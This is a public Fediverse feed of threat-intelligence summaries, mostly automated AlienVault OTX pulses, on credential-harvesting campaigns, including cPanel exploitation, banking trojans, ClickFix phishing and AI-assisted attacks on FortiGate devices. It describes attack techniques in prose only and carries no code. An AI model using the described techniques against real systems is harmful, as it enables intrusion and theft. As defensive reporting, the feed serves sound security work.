#credential-harvesting — Public Fediverse posts

Mysterious hacker organization operating secretly for 6 years is exploiting critical cPanel vulnerability to deploy backdoor trojans

A previously unknown threat group designated Mr_Rot13 has been exploiting CVE-2026-41940, a critical authentication bypass vulnerability in cPanel & WHM, to compromise Linux servers globally. Active since at least 2020, the group deploys a Go-based payload installer that plants SSH keys, PHP webshells, malicious JavaScript for credential harvesting, and a cross-platform remote access tool called Filemanager. Stolen data is exfiltrated to attacker-controlled Telegram channels and command servers. The group has maintained operational security for six years with extremely low detection rates. Attack infrastructure includes domains registered as early as 2020, with over 2,000 attacking IP addresses observed worldwide. The campaign primarily targets cPanel installations and WordPress systems, with confirmed compromise of Southeast Asian government and military entities resulting in 4.37GB of sensitive data theft.

Pulse ID: 6a01847e13b4074a8d4b6381
Pulse Link: https://otx.alienvault.com/pulse/6a01847e13b4074a8d4b6381
Pulse Author: AlienVault
Created: 2026-05-11 07:25:50

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Asia #BackDoor #CredentialHarvesting #CyberSecurity #DataTheft #Government #InfoSec #Java #JavaScript #Linux #Military #OTX #OpenThreatExchange #PHP #RAT #RDP #SSH #Telegram #Trojan #Troll #Vulnerability #Word #Wordpress #bot #AlienVault

TCLBANKER: Brazilian Banking Trojan Spreading via WhatsApp and Outlook

A sophisticated Brazilian banking trojan named TCLBANKER has been identified, representing a significant evolution of the MAVERICK/SORVEPOTEL malware family. The campaign employs a trojanized Logitech installer that deploys two .NET Reactor-protected modules through DLL side-loading. The banking trojan monitors 59 Brazilian financial institutions using UI Automation and features a WPF-based full-screen overlay framework for operator-driven social engineering attacks, including credential harvesting and fake system screens. A secondary worm module enables self-propagation through WhatsApp session hijacking and Outlook COM automation, sending phishing messages from victims' own accounts. The malware implements robust anti-analysis capabilities including environment-gated payload decryption, comprehensive watchdog systems, and ETW patching. Infrastructure is hosted on Cloudflare Workers, with evidence suggesting the campaign was detected in early operational stages.

Pulse ID: 69fb97e531a95b262c4925aa
Pulse Link: https://otx.alienvault.com/pulse/69fb97e531a95b262c4925aa
Pulse Author: AlienVault
Created: 2026-05-06 19:35:01

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Bank #BankingTrojan #Brazil #Cloud #CredentialHarvesting #CyberSecurity #ELF #InfoSec #Malware #NET #OTX #OpenThreatExchange #Outlook #Phishing #RAT #SocialEngineering #Trojan #WatchDog #WhatsApp #Worm #bot #AlienVault

Operation GriefLure: Dissecting an APT Campaign Targeting Vietnam's Military Telecom & Philippine Healthcare

A sophisticated spear phishing campaign dubbed Operation GriefLure targeted senior executives of Viettel Group, Vietnam's largest military-owned telecommunications provider, and St. Luke's Medical Center in the Philippines. The operation weaponized authentic legal documents from a genuine data breach dispute involving a Vietnamese citizen and Viettel, alongside fabricated whistleblower complaints targeting Philippine healthcare administrators. Attackers delivered malicious Windows LNK files within nested RAR archives, abusing native ftp.exe as a Living-off-the-Land dropper. Upon execution, the payload assembled polymorphic implants directly on disk from chunked .doc files, establishing persistence while displaying legitimate decoy PDFs. The malware enabled remote access through process injection, credential harvesting from browsers and remote access tools, screenshot capture, and file exfiltration via HTTPS C2 communication to infrastructure hosted on bulletproof Hong Kong servers.

Pulse ID: 69fc841d0cbc4c199d708315
Pulse Link: https://otx.alienvault.com/pulse/69fc841d0cbc4c199d708315
Pulse Author: AlienVault
Created: 2026-05-07 12:22:53

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CredentialHarvesting #CyberSecurity #DataBreach #HTTP #HTTPS #Healthcare #HongKong #InfoSec #LNK #Malware #Military #OTX #OpenThreatExchange #PDF #Philippines #Phishing #RAT #SpearPhishing #Telecom #Telecommunication #UK #Vietnam #Windows #bot #AlienVault

Inside Shadow-Earth-053: A China-Aligned Cyberespionage Campaign Against Government and Defense Sectors in Asia

A China-aligned threat group designated SHADOW-EARTH-053 has been conducting cyberespionage operations against government entities and critical infrastructure across at least eight countries in South, East, and Southeast Asia, plus one NATO member state, since December 2024. The group exploits unpatched Microsoft Exchange vulnerabilities, particularly the ProxyLogon chain, to gain initial access and deploys GODZILLA web shells for persistence. ShadowPad implants are staged via DLL sideloading of legitimate signed executables. Nearly half of the compromised environments showed overlap with another intrusion set, SHADOW-EARTH-054, sharing identical tooling including Evil-CreateDump and IOX proxy. The attackers conduct extensive Active Directory reconnaissance, credential harvesting, and mailbox exfiltration targeting high-profile government officials and defense contractors. Multiple tunneling tools including GOST and Wstunnel establish covert command-and-control channels, while lateral movement leverages WM...

Pulse ID: 69f3a95eda9a5492f5d1b6f4
Pulse Link: https://otx.alienvault.com/pulse/69f3a95eda9a5492f5d1b6f4
Pulse Author: AlienVault
Created: 2026-04-30 19:11:26

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Asia #China #CredentialHarvesting #CyberSecurity #Cyberespionage #Espionage #Government #InfoSec #Microsoft #NATO #OTX #OpenThreatExchange #Proxy #RAT #ShadowPad #SideLoading #bot #AlienVault

Large Scale Smishing & Credential Harvesting Campaign using Phoenix PhaaS

Phishing as a Service platform called Phoenix provides ready made tools and infrastructure which enables large scale smishing campaigns.

Pulse ID: 69f64e5ad6a8f740297614e5
Pulse Link: https://otx.alienvault.com/pulse/69f64e5ad6a8f740297614e5
Pulse Author: cryptocti
Created: 2026-05-02 19:19:54

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CredentialHarvesting #CyberSecurity #InfoSec #OTX #OpenThreatExchange #Phishing #Smishing #bot #cryptocti

User interaction with a ClickFix-style phishing site resulted in execution of an obfuscated PowerShell command

A ClickFix-style phishing campaign leveraged social engineering to trick users into executing obfuscated PowerShell commands that downloaded and installed a malicious MSI payload from a remote server. The attack employed a sophisticated multi-stage infection chain utilizing DLL sideloading techniques with renamed legitimate binaries to execute malicious components. The final payload deployed HijackLoader to deliver a Lumma-style information stealer designed for credential harvesting and data exfiltration. The campaign utilized multiple command-and-control domains and infrastructure hosted on specific IP addresses. Mitigation measures include blocking identified artifacts, enhancing user awareness about ClickFix social engineering tactics, implementing endpoint detection for suspicious PowerShell activity and unsigned DLL sideloading, and isolating compromised systems for remediation.

Pulse ID: 69f1de85544538ce8b03332a
Pulse Link: https://otx.alienvault.com/pulse/69f1de85544538ce8b03332a
Pulse Author: AlienVault
Created: 2026-04-29 10:33:41

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CredentialHarvesting #CyberSecurity #Endpoint #HijackLoader #ICS #InfoSec #OTX #OpenThreatExchange #Phishing #PowerShell #RAT #SideLoading #SocialEngineering #bot #AlienVault

Inside a Fake DHL Campaign Built to Steal Credentials

A consumer-targeted credential theft operation uses DHL brand impersonation combined with a fake OTP verification mechanism to harvest passwords from victims. The attack employs an 11-step chain beginning with spoofed shipment notification emails, leading victims through a client-side generated OTP page that creates false trust, then directing them to a DHL-branded credential harvesting portal. The kit captures passwords alongside victim telemetry including IP address, device details, browser fingerprinting, and geolocation data. Exfiltration occurs through EmailJS, a legitimate client-side email service, sending stolen credentials to an attacker-controlled Tutamail address. The campaign concludes by redirecting victims to the legitimate DHL website to avoid suspicion, demonstrating how familiar workflows and brand trust can be weaponized without technical sophistication.

Pulse ID: 69f11f15737a6a70e077e9d7
Pulse Link: https://otx.alienvault.com/pulse/69f11f15737a6a70e077e9d7
Pulse Author: AlienVault
Created: 2026-04-28 20:56:53

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CredentialHarvesting #CyberSecurity #Email #InfoSec #OTX #OpenThreatExchange #Password #Passwords #RAT #Rust #Troll #Word #bot #AlienVault

Tall Tales: How Chinese Actors Use Impersonation and Stolen Narratives to Perpetuate Digital Transnational Repression

In collaboration with the International Consortium of Investigative Journalists (ICIJ), two distinct actor clusters aligned with the People's Republic of China were identified targeting journalists and civil society members. GLITTER CARP conducted widespread credential harvesting campaigns against Uyghur, Tibetan, Taiwanese, and Hong Kong diaspora activists, as well as journalists covering these communities, employing digital impersonation and fake security alerts while frequently reusing infrastructure. SEQUIN CARP specifically targeted journalists involved in ICIJ's China Targets investigation using sophisticated OAuth consent phishing attacks with well-developed personas based on co-opted narratives, though operational mistakes revealed poor persona management. Both campaigns demonstrate China's Military-Civil Fusion system leveraging private contractors to conduct digital transnational repression at scale, with targeting intensifying following the China Targets publication that exposed Chinese governme...

Pulse ID: 69f05d291d899793ddba04f9
Pulse Link: https://otx.alienvault.com/pulse/69f05d291d899793ddba04f9
Pulse Author: AlienVault
Created: 2026-04-28 07:09:29

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#China #Chinese #CredentialHarvesting #CyberSecurity #HongKong #InfoSec #Military #OTX #OpenThreatExchange #Phishing #RAT #Tibet #bot #AlienVault

A Third Vultr Seoul Box: 60+ Kimsuky Domains, 18 Months of DDNS Rotation, and a 5-Year Infrastructure Trail

This analysis documents a third Vultr Seoul VPS (158.247.210.58) associated with Kimsuky operations, featuring over 60 domains across an 18-month period of systematic credential harvesting infrastructure. The actor demonstrates deliberate rotation through seven DDNS providers to evade blocklisting while maintaining the same backend VPS since at least September 2020. The domains systematically impersonate Naver, Korean National Tax Service (HomeTax), and government portals using prefixes like nid-user, n-store, nts-auth, and htax-login. Currently, 31 domains actively resolve while web ports remain closed, indicating a parked and ready operational posture. The infrastructure sits in AS20473 alongside two previously documented Vultr Seoul boxes, demonstrating the actor's clear preference for this provider and geographic proximity to South Korean targets.

Pulse ID: 69f06a838f5dae965dd8cbfd
Pulse Link: https://otx.alienvault.com/pulse/69f06a838f5dae965dd8cbfd
Pulse Author: AlienVault
Created: 2026-04-28 08:06:27

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CredentialHarvesting #CyberSecurity #DNS #Government #InfoSec #Kimsuky #Korea #OTX #OpenThreatExchange #RAT #SouthKorea #UK #Vultr #bot #AlienVault

Extortion in the Enterprise: Defending Against BlackFile Attacks

Since February 2026, multiple incidents involving data theft and extortion have been attributed to activity cluster CL-CRI-1116, also known as BlackFile, UNC6671, and Cordial Spider. These financially-motivated attackers, likely associated with "The Com" collective, employ voice-based phishing combined with credential harvesting through fraudulent login pages. They impersonate IT support staff to steal credentials and bypass multi-factor authentication. The attackers focus on Living Off the Land techniques, abusing legitimate APIs like Microsoft Graph to access SharePoint sites and Salesforce data. They search for confidential information and employee data within SaaS environments, then exfiltrate it through browser downloads or API exports. To pressure victims into paying seven-figure ransoms, attackers send demands via Gmail and compromised email accounts, sometimes employing SWATting tactics against executives.

Pulse ID: 69ef8ab862c07db686ca4572
Pulse Link: https://otx.alienvault.com/pulse/69ef8ab862c07db686ca4572
Pulse Author: AlienVault
Created: 2026-04-27 16:11:35

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CredentialHarvesting #CyberSecurity #DataTheft #Email #Extortion #ICS #InfoSec #Microsoft #OTX #OpenThreatExchange #Phishing #RAT #RCE #bot #AlienVault

Phishing Attack via Adobe-Themed Lure Delivering ScreenConnect and Credential Harvesting Tools

Pulse ID: 69eaf8302d013c66b8a8493c
Pulse Link: https://otx.alienvault.com/pulse/69eaf8302d013c66b8a8493c
Pulse Author: Tr1sa111
Created: 2026-04-24 04:57:20

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Adobe #CredentialHarvesting #CyberSecurity #InfoSec #OTX #OpenThreatExchange #Phishing #ScreenConnect #bot #Tr1sa111

Phishing Attack via Adobe-Themed Lure Delivering ScreenConnect and Credential Harvesting Tools

A phishing campaign utilized a fraudulent Adobe-themed website to trick victims into downloading and executing ScreenConnect remote access software. Once initial access was established, threat actors conducted interactive operations deploying multiple malicious binaries including a credential harvesting tool named password.exe. The attackers also exploited the ms-phone URI handler to launch the Phone Link application, attempting to socially engineer victims into linking their mobile devices to potentially capture notifications, authentication prompts, and sensitive information. The attack demonstrates a multi-stage compromise focusing on persistence establishment, credential theft, and preparation for potential lateral movement across the victim's network infrastructure.

Pulse ID: 69e9d7f4b00e56e9ebb52338
Pulse Link: https://otx.alienvault.com/pulse/69e9d7f4b00e56e9ebb52338
Pulse Author: AlienVault
Created: 2026-04-23 08:27:32

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Adobe #CredentialHarvesting #CyberSecurity #InfoSec #OTX #OpenThreatExchange #Password #Phishing #RAT #ScreenConnect #Word #bot #AlienVault

Bissa Scanner Exposed: AI-Assisted Mass Exploitation and Credential Harvesting - The DFIR Report

DFIR Labs is an artificial intelligence (AI) research and development company, which developed tools for mass exploitation and collection of data, including the Bissa scanner, React2Shell, and other tools.

Pulse ID: 69e9a5910752d9f4d8c32ec2
Pulse Link: https://otx.alienvault.com/pulse/69e9a5910752d9f4d8c32ec2
Pulse Author: Tr1sa111
Created: 2026-04-23 04:52:33

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CredentialHarvesting #CyberSecurity #InfoSec #OTX #OpenThreatExchange #bot #Tr1sa111

AI-augmented threat actor accesses FortiGate devices at scale

A Russian-speaking financially motivated threat actor leveraged multiple commercial generative AI services to compromise over 600 FortiGate devices across more than 55 countries between January and February 2026. The campaign exploited exposed management ports and weak credentials with single-factor authentication rather than software vulnerabilities. The actor used AI throughout all operational phases including tool development, attack planning, and reconnaissance automation, achieving scale previously requiring larger skilled teams. Post-exploitation activities included Active Directory compromise, credential harvesting, and targeting backup infrastructure consistent with pre-ransomware operations. Despite limited technical capabilities, the actor successfully extracted complete credential databases from multiple organizations, though they failed against hardened environments and moved to softer targets.

Pulse ID: 69e7a3cf924f430e51c91879
Pulse Link: https://otx.alienvault.com/pulse/69e7a3cf924f430e51c91879
Pulse Author: AlienVault
Created: 2026-04-21 16:20:31

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CredentialHarvesting #CyberSecurity #InfoSec #OTX #OpenThreatExchange #RAT #RansomWare #Russia #bot #AlienVault

FlowerStorm Phishing Kit Targeting Microsoft Credentials via Cloudflare-Backed Infrastructure

IOCs related to FlowerStorm phishing‑kit–driven campaign that delivers fake Microsoft authentication pages via compromised domains fronted by Cloudflare. The activity abuses legitimate cloud and CDN services for delivery while credential harvesting occurs on attacker‑controlled infrastructure, with incidental contact to Microsoft services during normal browser behavior. that uses its own web servers to target victims' login credentials and access to their personal details and login details on its servers.

Pulse ID: 69e628228cf9938a05a3c669
Pulse Link: https://otx.alienvault.com/pulse/69e628228cf9938a05a3c669
Pulse Author: AlienVault
Created: 2026-04-20 13:20:34

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Browser #CDN #Cloud #CredentialHarvesting #CyberSecurity #InfoSec #Microsoft #OTX #OpenThreatExchange #Phishing #Troll #bot #AlienVault

Untangling a Linux Incident With an OpenAI Twist

A technology sector organization experienced a multi-actor compromise on a Linux endpoint where cryptominers were deployed and credential harvesting occurred. The incident became complex when the legitimate user attempted to troubleshoot suspected malicious activity using OpenAI's Codex AI agent while threat actors remained active on the system. The EDR agent was installed mid-compromise, limiting historical visibility. Codex-generated commands created investigative challenges as they mimicked attacker techniques, triggering security detections and complicating the distinction between legitimate troubleshooting and malicious activity. While Codex helped terminate some malicious processes, it failed to provide complete remediation, allowing threat actors to continue exfiltrating credentials, tokens, and cloud metadata through multiple persistence mechanisms.

Pulse ID: 69e2417e5e4fdd5f16c75dbe
Pulse Link: https://otx.alienvault.com/pulse/69e2417e5e4fdd5f16c75dbe
Pulse Author: AlienVault
Created: 2026-04-17 14:19:42

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#Cloud #CredentialHarvesting #CryptoMiner #CyberSecurity #EDR #Endpoint #InfoSec #Linux #Mimic #OTX #OpenThreatExchange #RAT #SMS #bot #AlienVault

Using KATA and KEDR to detect the AdaptixC2 agent

AdaptixC2 is an emerging open-source post-exploitation framework rapidly adopted by threat actors in APT attacks and ransomware campaigns. Written in Go and C++, it supports Windows, macOS, and Linux with extensive modularity through Beacon Object Files (BOFs). The framework enables diverse command-and-control channels including HTTP/S, TCP, mTLS, DNS, DoH, and SMB with RC4 encryption throughout. It implements sophisticated evasion techniques targeting both network detection systems and endpoint defenses. Despite advanced obfuscation capabilities, network-level detection remains viable through analysis of distinctive communication patterns, header structures, and behavioral indicators. The framework supports credential harvesting via LSASS dumping, LAPS exploitation, and Kerberos attacks, alongside defense evasion through process injection and lateral movement via WinRM and PsExec. Combined NDR and EDR solutions provide effective multi-layered detection coverage against AdaptixC2 operations across network ...

Pulse ID: 69e2824daddc65cc4bab207d
Pulse Link: https://otx.alienvault.com/pulse/69e2824daddc65cc4bab207d
Pulse Author: AlienVault
Created: 2026-04-17 18:56:13

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#CredentialHarvesting #CyberSecurity #DNS #EDR #Encryption #Endpoint #HTTP #InfoSec #Linux #Mac #MacOS #OTX #OpenThreatExchange #PsExec #RAT #RCE #RansomWare #SMB #TCP #TLS #Windows #bot #AlienVault

Dissecting macOS intrusion from lure to compromise

Microsoft Threat Intelligence uncovered a macOS-focused cyber campaign by North Korean threat actor Sapphire Sleet utilizing social engineering to compromise systems. The attack chain begins with a malicious AppleScript file disguised as a Zoom SDK update, which executes cascading payloads through curl-to-osascript chains. The campaign deploys multiple backdoors including com.apple.cli, services, icloudz, and com.google.chromes.updaters for persistence and command execution. Credential harvesting occurs through fake system dialogs that mimic legitimate macOS password prompts. The threat actor bypasses Transparency, Consent, and Control protections by directly manipulating the TCC database, enabling extensive data exfiltration targeting cryptocurrency wallets, browser credentials, Telegram sessions, SSH keys, and Apple Notes. Operations focus on cryptocurrency, finance, and blockchain organizations with the primary objective of stealing digital assets.

Pulse ID: 69e1f157d8f8bb7547f8c23f
Pulse Link: https://otx.alienvault.com/pulse/69e1f157d8f8bb7547f8c23f
Pulse Author: AlienVault
Created: 2026-04-17 08:37:43

Be advised, this data is unverified and should be considered preliminary. Always do further verification.

#BackDoor #BlockChain #Browser #Chrome #Cloud #CredentialHarvesting #CyberSecurity #Google #InfoSec #Korea #Mac #MacOS #Microsoft #Mimic #NorthKorea #OTX #OpenThreatExchange #Password #RAT #SSH #SocialEngineering #Telegram #Word #Zoom #bot #cryptocurrency #AlienVault

New Infostealer Campaign Targets Popular Games, Pirated Software https://thecyberexpress.com/maranhao-infostealer-campaign/ #credentialharvesting #TheCyberExpressNews #TheCyberExpress #cryptocurrency #FirewallDaily #Cryptoattack #Cyberattack #InfoStealer #infostealer #CyberNews #malware #cyble

Account Credentials for Security Vendors Found on Dark Web https://thecyberexpress.com/security-vendor-credentials-found-on-dark-web/ #CybersecurityCompanies #credentialharvesting #TheCyberExpressNews #Credentialdatasale #leakedcredentials #TheCyberExpress #FirewallDaily #infostealer #CyberNews #darkweb #cyble

80% of All Security Exposures Come from Active Directory Accounts https://thecyberexpress.com/active-directory-exposures-on-a-high/ #ActiveDirectoryExposures #credentialharvesting #TheCyberExpressNews #ExposureManagement #CybersecurityNews #CredentialAttacks #domaincredentials #Misconfigurations #SecurityExposures #Misconfiguration #Vulnerabilities #Activedirectory #TheCyberExpress #FirewallDaily #ADExposures #dumping #relay #AD

Attackers are harvesting credentials from compromised systems. Here's how some commonly used tools can enable this.. https://www.darkreading.com/dr-tech/extracting-encrypted-credentials-from-common-tools #CredentialHarvesting #CompromisedSystems #CommonTools #CyberSecurity